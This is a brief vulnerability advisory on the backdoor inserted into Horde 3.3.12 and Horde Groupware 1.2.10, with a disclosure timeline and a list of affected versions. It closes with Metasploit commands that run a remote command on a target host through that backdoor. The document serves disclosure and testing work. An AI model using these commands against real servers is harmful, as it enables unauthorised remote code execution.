Timeline :

Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided the jduck 2012-02-16

PoC provided by :

Eric Romang

Reference(s) :


Affected version(s) :

Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7

Tested on Ubuntu 11.10 with :

Horde 3.3.12

Description :

This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.

Commands :

use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set PAYLOAD cmd/unix/generic 
set CMD uname -a